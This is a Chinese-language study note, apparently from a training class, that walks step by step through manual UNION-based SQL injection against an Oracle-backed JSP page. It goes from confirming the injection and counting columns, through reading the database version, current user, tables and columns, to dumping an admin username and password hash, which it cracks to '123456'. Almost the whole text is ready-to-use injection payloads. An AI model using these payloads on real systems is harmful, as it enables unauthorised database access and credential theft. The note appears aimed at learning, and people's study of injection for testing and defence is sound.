0X01 先进行判断
a.jsp?username=SMITH and 1=1
发现单引号闭合 我们尝试构造闭合 存在注入
a.jsp?username=SMITH' and '1'='1 正确 a.jsp?username=SMITH' and '1'='2 错误
0X02构造语句判断
a.jsp?username=SMITH' order by 8-- 正确 a.jsp?username=SMITH' order by 9-- 错误
用null 判断那个字段是字符型 第2 3 个字段为字符型
a.jsp?username=SMITH' union select null,'null',null,null,null,null,null,null from dual-- 正确
a.jsp?username=SMITH' union select null,null,'null',null,null,null,null,null from dual-- 正确
a.jsp?username=SMITH' union select 'null',null,null,null,null,null,null,null from dual-- 错误
0x03获取一些信息
数据库
a.jsp?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null from dual--
?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null,null,null,null,null from dual--
当前用户名为SCOOTT
(select member from v$logfile where rownum=1) 操作系统平台 (select instance_name from v$instance) 服务器sid
0X04爆第一个表 ADMIN
?username=SMITH' union select null,(select table_name from user_tables where rownum=1),null,null,null,null,null,null from dual--
爆第二个表 BONUS
a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN')),null,null,null,null,null,null from dual--
第三个表 后面的依次类推
a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN','BONUS')),null,null,null,null,null,null from dual--
0X05爆列名
第一个 ID
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN')),null,null,null,null,null,null from dual--
第二个 USERNAME
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID')),null,null,null,null,null,null from dual--
第三个 PASSWORD
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID','USERNAME')),null,null,null,null,null,null from dual--
0x06爆字段名 USERNAME=admin
/a.jsp?username=SMITH' union select null,(select USERNAME from ADMIN where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(select PASSWORD from ADMIN where rownum=1),null,null,null,null,null,null from dual--
PASSWORD=e10adc3949ba59abbe56e057f20f883e 123456
其他
列出数据库数据库名 SYS 其他数据库按照上面的推法 第二个数据库SYSTEM 爆了所有的
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS')),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS','SYSTEM','EXFSYS','CTXSYS','XDB','MDSYS','APEX_030200','SCOTT','OLAPSYS')),null,null,null,null,null,null from dual--
列出表名 一样 DUAL
/a.jsp?username=SMITH' union select null,(SELECT table_name FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
列出列名
.jsp?username=SMITH' union select null,(SELECT column_name FROM all_tab_columns WHERE table_name='DUAL' and rownum=1),null,null,null,null,null,null from dual--
by 谢谢卿哥带我们学习